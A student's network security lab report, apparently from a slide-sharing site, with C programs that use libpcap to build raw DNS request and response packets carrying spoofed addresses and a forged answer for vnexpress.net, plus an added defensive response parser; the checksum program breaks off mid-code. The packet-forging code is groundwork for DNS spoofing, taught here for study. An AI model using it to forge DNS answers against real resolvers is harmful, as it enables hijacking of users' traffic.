
NetworkSecurity MITM05016 DoNhuTai Lab2


7/27/2019 NetworkSecurity MITM05016 DoNhuTai Lab2

http://slidepdf.com/reader/full/networksecurity-mitm05016-donhutai-lab2 1/29

INTERNATIONAL UNIVERSITY
School of Computer Science and Engineering

LAB 2: DNS attack (Part 1 + 2)

Course: Network Security    Lecturer: Pham Van Hau, PhD    Date: 24/09/2013    Duration: 180 minutes

Student ID: "IT"#$#%&    Student name: Do Nhu Tai

Introduction

To do the DNS Hijacking attack, you need to

• know how to generate and capture packets programmatically,

• understand the UDP and DNS packet headers as well as the DNS protocol.

The purpose of this lab is to give you hands-on experience in low level network programming. More precisely, you are going to create the DNS request and response. These will help you a lot for the next lab :).

In general, to generate the raw packet you can use

• the pcap library (http://www.tcpdump.org/pcap.html),

• the Libnet library http://packetfactory.openwall.net/projects/libnet/dist/deprecated/manual/lrm.html

• or even the standard API http://en.wikipedia.org/wiki/Berkeley_sockets

In the context of this lab, we use the pcap library for our purpose. Several useful pieces of information can be found at http://www.tcpdump.org/pcap.html

To help you get an idea of what a DNS packet looks like, on your linux machine

• open wireshark to capture the traffic

• open a terminal and execute "nslookup vnexpress.net"

Try to look at the different fields of the captured DNS packet and understand what they are used for.

This link http://www.networksorcery.com/enp/protocol/dns.htm is also a great source for this purpose.

Part I: DNS packet generation

To help you with the programming, I have created two programs, called dns_request_gen.c and dns_response_gen.c. The programs I sent you are not complete. You need to modify them at several places (I have marked them as "TO BE MODIFIED").

I. DNS packet request

Modify dns_request_gen.c to generate the DNS request that has the

• source MAC: A1 A2 A3 A4 A5 A6

• destination MAC: B1 B2 B3 B4 B5 B6

• source port: 4000

• destination port: 53

• Transaction ID: AABB

• source IP address: 1.2.3.4

• destination IP address: 6.7.8.9

• DNS query asking for the IP address of "vnexpress.net"


Answer: Dntai_dns_request_v1.c (without ip, udp checksum)

#include <stdio.h>       // printf (needed, was missing from the include list)
#include <string.h>      // strlen
#include <strings.h>     // bcopy
#include <stdlib.h>      // malloc, exit
#include <sys/socket.h>  // you know what this is for
#include <arpa/inet.h>   // inet_addr, inet_ntoa, ntohs etc
#include <netinet/in.h>
#include <unistd.h>      // getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14

/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6

/* UDP PROTOCOL number */
#define UDP_PRO 17

struct dns_query {
  u_short q_type;   /* type of the host */
  u_short q_class;  /* class */
};

struct ethernet_header {
  u_char ether_dhost[ETHER_ADDR_LEN];  /* destination host address */
  u_char ether_shost[ETHER_ADDR_LEN];  /* source host address */
  u_short ether_type;                  /* IP, ARP, RARP, etc */
};

/* IP header */
struct ip_header {
  u_char ip_vhl;   /* version << 4 | header length >> 2 */
  u_char ip_tos;   /* type of service */
  u_short ip_len;  /* total length */
  u_short ip_id;   /* identification */
  u_short ip_off;  /* fragment offset field */
#define IP_RF 0x8000       /* reserved fragment flag */
#define IP_DF 0x4000       /* dont fragment flag */
#define IP_MF 0x2000       /* more fragments flag */
#define IP_OFFMASK 0x1fff  /* mask for fragmenting bits */
  u_char ip_ttl;   /* time to live */
  u_char ip_p;     /* protocol */
  u_short ip_sum;  /* checksum */
  struct in_addr ip_src, ip_dst;
};

#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)  (((ip)->ip_vhl) >> 4)

struct udp_header {
  u_short udp_sport;  /* source port */
  u_short udp_dport;  /* destination port */
  u_short udp_len;    /* udp length */
  u_short udp_sum;    /* udp checksum */
};

struct dns_header {
  u_short id;          /* transaction ID */
  u_short flags;       /* flags */
  u_short q_count;     /* number of question entries */
  u_short ans_count;   /* number of answer entries */
  u_short auth_count;  /* number of authority entries */
  u_short add_count;   /* number of resource entries */
};

/* functions */
void print_app_info(void) {
  printf("Dns request version 1 written by Do Nhu Tai\n");
}

void DNS_name_converter(char *host, char *dns);

/* Convert "vnexpress.net" into the DNS label format "\x09vnexpress\x03net\x00":
 * walk the host name backwards and count the characters up to each 'dot'. */
void DNS_name_converter(char *host, char *dns) {
  int len = strlen(host);
  dns[len + 1] = 0;  // terminating zero-length label (the original wrote dns[len + 2], one byte past the name)
  int count = 0;     // number of characters seen since the last 'dot'
  while (len > 0) {  // while there are characters of the host name left
    if (host[len - 1] == '.') {  // count from the last character of the host name; on a 'dot':
      dns[len] = count;          // store the counted number into the dns name buffer
      count = 0;                 // set count to zero for the next label
    } else {
      dns[len] = host[len - 1];  // if the character is not a 'dot' store it into the dns name buffer
      count++;                   // increase count
    }
    len--;                       // decrease len
  }
  dns[0] = count;  // reached the first character: store the final count as the first label length
}

int main(int argc, char *argv[]) {
  char errb[PCAP_ERRBUF_SIZE];
  pcap_t *descr;        // session description
  bpf_u_int32 net;      // ip of device
  bpf_u_int32 mask;     // subnet mask
  int i, result, size_ip;
  char *host;           // host name to look up ip. Ex: vnexpress.net
  char *dev;            // network device to capture. Ex: eth0
  u_char packet[5000];  // packet is the buffer that holds the data

  print_app_info();

  if (argc != 3) {
    printf("Usage: %s <Network Device's Name> <Hostname ex:www.vnexpress.net> \n", argv[0]);
    exit(1);
  } else {
    dev = argv[1];
    host = argv[2];
  }

  // checking for a suitable network device and storing the ip, subnet mask for future use
  if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
    printf("Error: %s\n", errb);
    exit(1);
  }

  // set the pcap description
  descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
  if (descr == NULL) {
    printf("Set description failed: %s\n", errb);
    exit(1);
  }

  // zero out the packet ([Ethernet] + [IP] + [TCP/UDP] + [Application])
  memset(packet, 0, sizeof(packet));  // packet is the array that holds the data to send

  /* Build a [DNS REQUEST] packet:
     Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
  struct ethernet_header *eth;  // pointer to the start of the ethernet header
  struct ip_header *ip;         // pointer to the start of the ip header
  struct udp_header *udp;       // pointer to the start of the udp header
  struct dns_header *dns;       // pointer to the start of the dns header

  u_char *q_name;               // pointer to the start of the query_name
  int host_len = strlen(host);  // the query name length is the number of characters of the host name (vnexpress.net has len=13)
  struct dns_query *dns_qr;     // pointer to the start of the dns query

  int size_q_name = host_len + 2;  // size of the query name: host name + leading length byte + terminating zero

  /* Set up the pointers to the corresponding regions of the packet */
  eth = (struct ethernet_header *)(packet);
  /**************************** TO BE MODIFIED 1 ***************************/
  ip = (struct ip_header *)(packet + SIZE_ETH);
  /**************************** TO BE MODIFIED 2 ***************************/
  udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
  /**************************** TO BE MODIFIED 3 ***************************/
  dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));

  // Query Name Pointer:
  q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
  // Dns Query Pointer:
  dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);

  /* Ethernet Header */
  bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", eth->ether_shost, 6);  // Source MAC Address
  /**************************** TO BE MODIFIED 4 ***************************/
  bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", eth->ether_dhost, 6);  // Destination MAC Address
  bcopy("\x08\x00", (char *)&eth->ether_type, 2);          // Type IP (0x0800)

  /* IP Header */
  ip->ip_vhl = 0x45;          // IP version 4 & length = 5 words (20 bytes)
  ip->ip_tos = 0x00;          // Differentiated Services Field
  ip->ip_id = htons(0xf1a4);  // Identification
  ip->ip_off = 0;
  ip->ip_ttl = 64;            // time to live
  ip->ip_p = UDP_PRO;         // UDP protocol
  ip->ip_sum = 0;             // ip checksum (left at 0 in this version)

  (ip->ip_src).s_addr = inet_addr("1.2.3.4");  // source ip address
  /**************************** TO BE MODIFIED 5 ***************************/
  (ip->ip_dst).s_addr = inet_addr("6.7.8.9");  // destination ip address

  /* UDP Header */
  udp->udp_sport = htons(4000);
  /**************************** TO BE MODIFIED 6 ***************************/
  udp->udp_dport = htons(53);  // destination port
  udp->udp_sum = 0;            // udp checksum (left at 0 in this version)

  /* DNS Header */
  dns->id = htons(0xAABB);       // transaction ID
  dns->flags = htons(0x0100);    // flags (standard query)
  dns->q_count = htons(0x0001);  // number of questions
  dns->ans_count = 0;            // number of answers
  dns->auth_count = 0;           // number of authority
  dns->add_count = 0;            // number of resource

  /* DNS Query: query_name, dns query header */
  // Convert hostname to dns format and store in memory where q_name points to
  DNS_name_converter(host, (char *)q_name);
  dns_qr->q_type = htons(1);   // type of the host
  dns_qr->q_class = htons(1);  // class

  /* Update Length of Ip Header and Udp Header */
  udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));
  ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));  // total length (the original added two network-order values, which only works below 256)
  size_ip = IP_HL(ip) * 4;

  /* send packet 6 times */
  for (i = 0; i <= 5; i++) {
    result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
    if (result == 0)
      printf("[Packet sent successfully]\n");
    else
      printf("[Packet sent failure]\n");
  }

  pcap_close(descr);
  return 0;
}


Result with capturing packet:

• Receive 6 dns request packets

• Ethernet Header

• IP Header (with checksum error)

• UDP Header

• Dns Query

II. DNS packet response

Modify dns_response_gen.c to generate the DNS response that has the

• source MAC: B1 B2 B3 B4 B5 B6

• destination MAC: A1 A2 A3 A4 A5 A6

• source port: 53

• destination port: 4000

• Transaction ID: AABB

• source IP address: 6.7.8.9

• destination IP address: 1.2.3.4

• DNS response: the IP address of "vnexpress.net" is "111.65.248.132"

Answer: Dntai_dns_response_v1.c (without ip, udp checksum)

#include <stdio.h>       // printf (needed, was missing from the include list)
#include <string.h>      // strlen
#include <strings.h>     // bcopy
#include <stdlib.h>      // malloc, exit
#include <sys/socket.h>  // you know what this is for
#include <arpa/inet.h>   // inet_addr, inet_ntoa, ntohs etc
#include <netinet/in.h>
#include <unistd.h>      // getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14

/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6

/* UDP PROTOCOL number */
#define UDP_PRO 17

/* one A answer; packed so the struct matches the 16-byte on-wire layout */
struct __attribute__((packed)) dns_answer {
  u_short a_name;          /* answer host name (compression pointer) */
  u_short a_type;          /* answer host type */
  u_short a_class;         /* answer host class */
  u_char a_ttl[4];         /* time to live, 4 bytes */
  u_short a_len;           /* length of the address */
  struct in_addr a_addr;   /* address of host */
};

struct dns_query {
  u_short q_type;   /* type of the host */
  u_short q_class;  /* class */
};

struct ethernet_header {
  u_char ether_dhost[ETHER_ADDR_LEN];  /* destination host address */
  u_char ether_shost[ETHER_ADDR_LEN];  /* source host address */
  u_short ether_type;                  /* IP, ARP, RARP, etc */
};

/* IP header */
struct ip_header {
  u_char ip_vhl;   /* version << 4 | header length >> 2 */
  u_char ip_tos;   /* type of service */
  u_short ip_len;  /* total length */
  u_short ip_id;   /* identification */
  u_short ip_off;  /* fragment offset field */
#define IP_RF 0x8000       /* reserved fragment flag */
#define IP_DF 0x4000       /* dont fragment flag */
#define IP_MF 0x2000       /* more fragments flag */
#define IP_OFFMASK 0x1fff  /* mask for fragmenting bits */
  u_char ip_ttl;   /* time to live */
  u_char ip_p;     /* protocol */
  u_short ip_sum;  /* checksum */
  struct in_addr ip_src, ip_dst;
};

#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)  (((ip)->ip_vhl) >> 4)

struct udp_header {
  u_short udp_sport;  /* source port */
  u_short udp_dport;  /* destination port */
  u_short udp_len;    /* udp length */
  u_short udp_sum;    /* udp checksum */
};

struct dns_header {
  u_short id;          /* transaction ID */
  u_short flags;       /* flags */
  u_short q_count;     /* number of question entries */
  u_short ans_count;   /* number of answer entries */
  u_short auth_count;  /* number of authority entries */
  u_short add_count;   /* number of resource entries */
};

/* functions */
void print_app_info(void) {
  printf("Dns response version 1 written by Do Nhu Tai\n");
}

void DNS_name_converter(char *host, char *dns);

/* Convert "vnexpress.net" into the DNS label format "\x09vnexpress\x03net\x00":
 * walk the host name backwards and count the characters up to each 'dot'. */
void DNS_name_converter(char *host, char *dns) {
  int len = strlen(host);
  dns[len + 1] = 0;  // terminating zero-length label (the original wrote dns[len + 2], one byte past the name)
  int count = 0;     // number of characters seen since the last 'dot'
  while (len > 0) {  // while there are characters of the host name left
    if (host[len - 1] == '.') {  // count from the last character of the host name; on a 'dot':
      dns[len] = count;          // store the counted number into the dns name buffer
      count = 0;                 // set count to zero for the next label
    } else {
      dns[len] = host[len - 1];  // if the character is not a 'dot' store it into the dns name buffer
      count++;                   // increase count
    }
    len--;                       // decrease len
  }
  dns[0] = count;  // reached the first character: store the final count as the first label length
}

int main(int argc, char *argv[]) {
  u_char packet[5000];  // packet is the buffer that holds the data
  char *dev;            // network device
  char errb[PCAP_ERRBUF_SIZE];
  pcap_t *descr;        // session description
  bpf_u_int32 net;      // ip of device
  bpf_u_int32 mask;     // subnet mask
  int i, result, size_ip;
  char *host;

  print_app_info();

  if (argc != 3) {
    printf("Usage: %s <Network Device's Name> <Hostname ex:www.vnexpress.net> \n", argv[0]);
    exit(1);
  } else {
    dev = argv[1];
    host = argv[2];
  }

  // checking for a suitable network device and storing the ip, subnet mask for future use
  if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
    printf("Error: %s\n", errb);
    exit(1);
  }

  // set the pcap description
  descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
  if (descr == NULL) {
    printf("Set description failed: %s\n", errb);
    exit(1);
  }

  // zero out the packet
  memset(packet, 0, sizeof(packet));

  /* Build a [DNS RESPONSE] packet:
     Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query + Dns Answer */
  struct ethernet_header *eth;  // pointer to the start of the ethernet header
  struct ip_header *ip;         // pointer to the start of the ip header
  struct udp_header *udp;       // pointer to the start of the udp header
  struct dns_header *dns;       // pointer to the start of the dns header
  struct dns_query *dns_qr;     // pointer to the start of the dns query

  u_char *q_name;               // Dns name in query
  struct dns_answer *dns_as;    // pointer to the start of the dns answer

  int host_len = strlen(host);     // Hostname length
  int size_q_name = host_len + 2;  // size of the query name: host name + leading length byte + terminating zero

  /* Set up the pointers to the corresponding regions of the packet */
  eth = (struct ethernet_header *)(packet);
  /**************************** TO BE MODIFIED 1 ***************************/
  ip = (struct ip_header *)(packet + SIZE_ETH);
  /**************************** TO BE MODIFIED 2 ***************************/
  udp = (struct udp_header *)(packet + SIZE_ETH + sizeof(struct ip_header));
  /**************************** TO BE MODIFIED 3 ***************************/
  dns = (struct dns_header *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header));

  // Query name Pointer
  q_name = (u_char *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header));
  // Dns Query Pointer
  dns_qr = (struct dns_query *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name);
  // Dns Answer Pointer
  dns_as = (struct dns_answer *)(packet + SIZE_ETH + sizeof(struct ip_header) + sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));

  /* Ethernet Header */
  bcopy("\xB1\xB2\xB3\xB4\xB5\xB6", eth->ether_shost, 6);  // Source MAC Address
  /**************************** TO BE MODIFIED 4 ***************************/
  bcopy("\xA1\xA2\xA3\xA4\xA5\xA6", eth->ether_dhost, 6);  // Destination MAC Address
  bcopy("\x08\x00", (char *)&eth->ether_type, 2);          // Type IP (0x0800)

  /* IP Header */
  ip->ip_vhl = 0x45;          // IP version 4 & length = 5 words (20 bytes)
  ip->ip_tos = 0x00;          // Differentiated Services Field
  ip->ip_id = htons(0xf1a4);  // Identification
  ip->ip_off = 0;
  ip->ip_ttl = 64;            // time to live
  ip->ip_p = UDP_PRO;         // UDP protocol
  ip->ip_sum = 0;             // ip checksum (left at 0 in this version)

  (ip->ip_src).s_addr = inet_addr("6.7.8.9");  // source ip address
  /**************************** TO BE MODIFIED 5 ***************************/
  (ip->ip_dst).s_addr = inet_addr("1.2.3.4");  // destination ip address

  /* UDP Header */
  udp->udp_sport = htons(53);    // source port
  /**************************** TO BE MODIFIED 6 ***************************/
  udp->udp_dport = htons(4000);  // destination port
  udp->udp_sum = 0;              // udp checksum (left at 0 in this version)

  /* DNS Header */
  dns->id = htons(0xAABB);         // transaction ID
  dns->flags = htons(0x8180);      // flags (standard query response, no error)
  dns->q_count = htons(0x0001);    // number of questions
  dns->ans_count = htons(0x0001);  // number of answers
  dns->auth_count = 0;             // number of authority
  dns->add_count = 0;              // number of resource

  /* DNS Query: query_name, dns query header, dns query answer */
  // Convert hostname to dns format and store in memory where q_name points to
  DNS_name_converter(host, (char *)q_name);
  dns_qr->q_type = htons(1);   // type of the host
  dns_qr->q_class = htons(1);  // class

  /* DNS Answer */
  bcopy("\xc0\x0c", (char *)&dns_as->a_name, 2);  // name = compression pointer to the query name at offset 12
  dns_as->a_type = htons(1);                      // type of the host
  dns_as->a_class = htons(1);                     // class
  bcopy("\x00\x00\x01\xc3", dns_as->a_ttl, 4);    // time to live = 451 seconds
  dns_as->a_len = htons(4);                       // length of an IPv4 address

  /**************************** TO BE MODIFIED 7 ***************************/
  dns_as->a_addr.s_addr = inet_addr("111.65.248.132");

  /* Update Length of Ip Header and Udp Header */
  udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query) + sizeof(struct dns_answer));
  ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));  // total length (the original added two network-order values, which only works below 256)
  size_ip = IP_HL(ip) * 4;

  /* send packet 6 times */
  for (i = 0; i <= 5; i++) {
    result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
    if (result == 0)
      printf("[Packet sent successfully]\n");
    else
      printf("[Packet sent failure]\n");
  }

  pcap_close(descr);
  return 0;
}

Result with capturing packet:

• Receive 6 dns response packets
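The wire format that both answers above assemble by hand (label-encoded names, the 0xC00C compression pointer in the answer) is also what a resolver or a detector has to parse on the receiving side. The following is an added example, not part of the lab or of the student's code: it encodes a host name the way DNS_name_converter does, then parses a constructed copy of the part II response with bounds checks and pointer-loop protection and extracts the answered A record. All function names (dns_encode_name, dns_decode_name, parse_a_response, self_check) and the lab_response bytes are this example's own, built from the values stated in the lab.

```c
#include <stdint.h>
#include <string.h>

/* Encode "vnexpress.net" as "\x09vnexpress\x03net\x00", the label format the lab's
 * DNS_name_converter writes; rejects empty labels (leading/double/trailing dots)
 * and labels over 63 bytes. Returns bytes written, or -1. */
static int dns_encode_name(const char *host, uint8_t *out, size_t outlen)
{
    size_t hl = strlen(host), pos = 0, w = 1;   /* pos: current length byte, w: write index */
    if (hl == 0 || hl > 253 || outlen < hl + 2) return -1;
    for (size_t i = 0; i <= hl; i++) {
        if (host[i] == '.' || host[i] == '\0') {
            size_t lablen = w - pos - 1;
            if (lablen == 0 || lablen > 63) return -1;
            out[pos] = (uint8_t)lablen;
            pos = w++;
        } else {
            out[w++] = (uint8_t)host[i];
        }
    }
    out[pos] = 0;                               /* root label ends the name */
    return (int)w;
}

/* Decode the name at msg[off], following 0xC0 compression pointers (RFC 1035 4.1.4)
 * such as the lab's answer name 0xC00C. Pointers must point backwards and chains are
 * bounded, so a looping pointer fails instead of hanging. Returns bytes used at off, or -1. */
static int dns_decode_name(const uint8_t *msg, size_t msglen, size_t off,
                           char *out, size_t outlen)
{
    size_t o = 0, consumed = 0;
    int jumped = 0, hops = 0;
    if (outlen == 0) return -1;
    for (;;) {
        if (off >= msglen) return -1;
        uint8_t len = msg[off];
        if ((len & 0xC0) == 0xC0) {                  /* compression pointer */
            if (off + 1 >= msglen || ++hops > 8) return -1;
            size_t target = ((size_t)(len & 0x3F) << 8) | msg[off + 1];
            if (target >= off) return -1;
            if (!jumped) consumed += 2;              /* a pointer costs 2 bytes where it sits */
            jumped = 1;
            off = target;
            continue;
        }
        if (len > 63) return -1;                     /* 0x40/0x80 prefixes are not labels */
        if (!jumped) consumed += (size_t)len + 1;
        off++;
        if (len == 0) break;                         /* root label */
        if (off + len > msglen || o + len + 2 > outlen) return -1;
        if (o) out[o++] = '.';
        memcpy(out + o, msg + off, len);
        o += len; off += len;
    }
    out[o] = '\0';
    return (int)consumed;
}

struct dns_a_answer { uint16_t txid; char qname[256], aname[256]; uint8_t ip[4]; uint32_t ttl; };

/* Parse a response and extract the first A record, as a detector would before
 * comparing the answer with what it expects. Returns 0 on success, else -1. */
static int parse_a_response(const uint8_t *msg, size_t len, struct dns_a_answer *r)
{
    if (len < 12 || !(msg[2] & 0x80) || (msg[3] & 0x0F)) return -1;  /* not a response / RCODE != 0 */
    r->txid = (uint16_t)((msg[0] << 8) | msg[1]);
    unsigned qd = (msg[4] << 8) | msg[5], an = (msg[6] << 8) | msg[7];
    if (qd != 1 || an < 1) return -1;
    size_t p = 12;
    int n = dns_decode_name(msg, len, p, r->qname, sizeof r->qname);
    if (n < 0 || p + n + 4 > len) return -1;
    p += n + 4;                                                /* skip QTYPE, QCLASS */
    for (unsigned i = 0; i < an; i++) {
        n = dns_decode_name(msg, len, p, r->aname, sizeof r->aname);
        if (n < 0 || p + n + 10 > len) return -1;
        p += n;
        unsigned type = (msg[p] << 8) | msg[p + 1], rdlen = (msg[p + 8] << 8) | msg[p + 9];
        r->ttl = ((uint32_t)msg[p + 4] << 24) | ((uint32_t)msg[p + 5] << 16) |
                 ((uint32_t)msg[p + 6] << 8) | msg[p + 7];
        p += 10;
        if (p + rdlen > len) return -1;
        if (type == 1 && rdlen == 4) { memcpy(r->ip, msg + p, 4); return 0; }
        p += rdlen;                                            /* skip other record types */
    }
    return -1;
}

/* The lab's response as captured bytes (constructed here): TXID AABB, flags 8180,
 * question vnexpress.net/A/IN, answer NAME=C00C TYPE=A TTL=451 RDATA=111.65.248.132. */
static const uint8_t lab_response[47] = {
    0xAA, 0xBB, 0x81, 0x80, 0, 1, 0, 1, 0, 0, 0, 0,
    9, 'v','n','e','x','p','r','e','s','s', 3, 'n','e','t', 0, 0, 1, 0, 1,
    0xC0, 0x0C, 0, 1, 0, 1, 0x00, 0x00, 0x01, 0xC3, 0, 4, 111, 65, 248, 132 };

/* Self-check: 0 if every step passes, otherwise the number of the failing step. */
static int self_check(void)
{
    static const uint8_t loop[2] = { 0xC0, 0x00 }, ip[4] = { 111, 65, 248, 132 };
    uint8_t name[64]; char out[256]; struct dns_a_answer a;
    if (dns_encode_name("vnexpress.net", name, sizeof name) != 15) return 1;
    if (memcmp(name, lab_response + 12, 15) != 0) return 2;     /* same bytes as the question */
    if (dns_encode_name("bad..name", name, sizeof name) != -1) return 3;
    if (parse_a_response(lab_response, sizeof lab_response, &a) != 0) return 4;
    if (a.txid != 0xAABB || strcmp(a.aname, "vnexpress.net") || a.ttl != 451) return 5;
    if (memcmp(a.ip, ip, 4) != 0) return 6;
    if (dns_decode_name(loop, 2, 0, out, sizeof out) != -1) return 7; /* self-pointing name */
    return 0;
}
```

The parsed txid, qname and ip are exactly the fields a resolver compares against its outstanding query before accepting an answer, so a response whose transaction ID or question does not match the request is the one to log rather than cache.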

III. DNS packet response

The checksums (of the IP and UDP headers) of the generated packets are wrong. Do what is necessary to make them right.

Answer: Dntai_dns_request_v.c (with ip, udp checksum)

#include <stdio.h>       // printf (needed, was missing from the include list)
#include <string.h>      // strlen
#include <strings.h>     // bcopy
#include <stdlib.h>      // malloc, exit
#include <sys/socket.h>  // you know what this is for
#include <arpa/inet.h>   // inet_addr, inet_ntoa, ntohs etc
#include <netinet/in.h>
#include <unistd.h>      // getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14

/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6

/* UDP PROTOCOL number */
#define UDP_PRO 17

struct dns_query {
  u_short q_type;   /* type of the host */
  u_short q_class;  /* class */
};

struct ethernet_header {
  u_char ether_dhost[ETHER_ADDR_LEN];  /* destination host address */
  u_char ether_shost[ETHER_ADDR_LEN];  /* source host address */
  u_short ether_type;                  /* IP, ARP, RARP, etc */
};

/* IP header */
struct ip_header {
  u_char ip_vhl;   /* version << 4 | header length >> 2 */
  u_char ip_tos;   /* type of service */
  u_short ip_len;  /* total length */
  u_short ip_id;   /* identification */
  u_short ip_off;  /* fragment offset field */
#define IP_RF 0x8000       /* reserved fragment flag */
#define IP_DF 0x4000       /* dont fragment flag */
#define IP_MF 0x2000       /* more fragments flag */
#define IP_OFFMASK 0x1fff  /* mask for fragmenting bits */
  u_char ip_ttl;   /* time to live */
  u_char ip_p;     /* protocol */
  u_short ip_sum;  /* checksum */
  struct in_addr ip_src, ip_dst;
};

#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)  (((ip)->ip_vhl) >> 4)

struct udp_header {
  u_short udp_sport;  /* source port */
  u_short udp_dport;  /* destination port */
  u_short udp_len;    /* udp length */
  u_short udp_sum;    /* udp checksum */
};

struct dns_header {
  u_short id;          /* transaction ID */
  u_short flags;       /* flags */
  u_short q_count;     /* number of question entries */
  u_short ans_count;   /* number of answer entries */
  u_short auth_count;  /* number of authority entries */
  u_short add_count;   /* number of resource entries */
};

/* functions */
void print_app_info(void) {
  printf("Dns request version 2 written by Do Nhu Tai\n");
}

void DNS_name_converter(char *host, char *dns);

/* Convert "vnexpress.net" into the DNS label format "\x09vnexpress\x03net\x00":
 * walk the host name backwards and count the characters up to each 'dot'. */
void DNS_name_converter(char *host, char *dns) {
  int len = strlen(host);
  dns[len + 1] = 0;  // terminating zero-length label (the original wrote dns[len + 2], one byte past the name)
  int count = 0;     // number of characters seen since the last 'dot'
  while (len > 0) {  // while there are characters of the host name left
    if (host[len - 1] == '.') {  // count from the last character of the host name; on a 'dot':
      dns[len] = count;          // store the counted number into the dns name buffer
      count = 0;                 // set count to zero for the next label
    } else {
      dns[len] = host[len - 1];  // if the character is not a 'dot' store it into the dns name buffer
      count++;                   // increase count
    }
    len--;                       // decrease len
  }
  dns[0] = count;  // reached the first character: store the final count as the first label length
}

/* FUNCTIONS THAT CREATE THE CHECKSUM OF UDP, IP */
unsigned short csum(unsigned short *buf, int nwords);

unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);

/* IP header checksum. nwords is really the header length in bytes (size_ip = 20);
 * the loop sums nwords/2 16-bit words. The words are summed in network byte order,
 * and a one's-complement sum is byte-order independent, so the result is stored
 * in ip_sum directly without htons(). */
unsigned short csum(unsigned short *buf, int nwords) {
  unsigned long sum = 0;
  int i;
  for (i = 0; i < (nwords / 2); i++)
    sum += buf[i];

  sum = (sum >> 16) + (sum & 0xffff);  // fold the carries back into the low 16 bits
  sum += (sum >> 16);

  return ~sum;
}

/* UDP checksum over the pseudo header (source ip, destination ip, protocol, length)
 * and the UDP header + payload in buff, which must still have udp_sum == 0. */
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]) {
  unsigned short udp_protocol = UDP_PRO;
  unsigned short padding = 0;
  unsigned long sum;
  int i;

  // Find out if the length of the data is even or odd. If odd, add a padding byte = 0 at the end of the packet
  if (len % 2 != 0) {
    padding = 1;
    ((unsigned char *)buff)[len] = 0;  // the original wrote buff[len], a 16-bit index, i.e. byte offset 2*len
  }

  // Initialize sum to zero
  sum = 0;

  // Sum all the buffer in 16 bit words
  for (i = 0; i < (len + padding) / 2; i++)
    sum += ntohs((unsigned short)buff[i]);

  // Sum the pseudo header which contains source ip, destination ip, protocol number and length
  for (i = 0; i < 2; i++)
    sum += ntohs((unsigned short)ip_src[i]);

  for (i = 0; i < 2; i++)
    sum += ntohs((unsigned short)ip_dst[i]);

  sum += (unsigned short)udp_protocol + (unsigned short)len;

  while (sum >> 16)  // fold the carries until the sum fits in 16 bits
    sum = (sum & 0xFFFF) + (sum >> 16);

  return ~sum;  // host byte order; the caller applies htons()
}

int main(int argc, char *argv[]) {
  char errb[PCAP_ERRBUF_SIZE];
  pcap_t *descr;        // session description
  bpf_u_int32 net;      // ip of device
  bpf_u_int32 mask;     // subnet mask
  int i, result, size_ip;
  char *host;           // host name to look up ip. Ex: vnexpress.net
  char *dev;            // network device to capture. Ex: eth0
  u_char packet[5000];  // packet is the buffer that holds the data

  print_app_info();

  if (argc != 3) {
    printf("Usage: %s <Network Device's Name> <Hostname ex:www.vnexpress.net> \n", argv[0]);
    exit(1);
  } else {
    dev = argv[1];
    host = argv[2];
  }

  // checking for a suitable network device and storing the ip, subnet mask for future use
  if (pcap_lookupnet(dev, &net, &mask, errb) == -1) {
    printf("Error: %s\n", errb);
    exit(1);
  }

  // set the pcap description
  descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
  if (descr == NULL) {
    printf("Set description failed: %s\n", errb);
    exit(1);
  }

  // zero out the packet ([Ethernet] + [IP] + [TCP/UDP] + [Application])
  memset(packet, 0, sizeof(packet));  // packet is the array that holds the data to send

  /* Build a [DNS REQUEST] packet:
     Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
  struct ethernet_header *eth;  // pointer to the start of the ethernet header
  struct ip_header *ip;         // pointer to the start of the ip header
  struct udp_header *udp;       // pointer to the start of the udp header
  struct dns_header *dns;       // pointer to the start of the dns header

  u_char *q_name;               // pointer to the start of the query_name
  int host_len = strlen(host);  // the query name length is the number of characters of the host name (vnexpress.net has len=13)
  struct dns_query *dns_qr;     // pointer to the start of the dns query

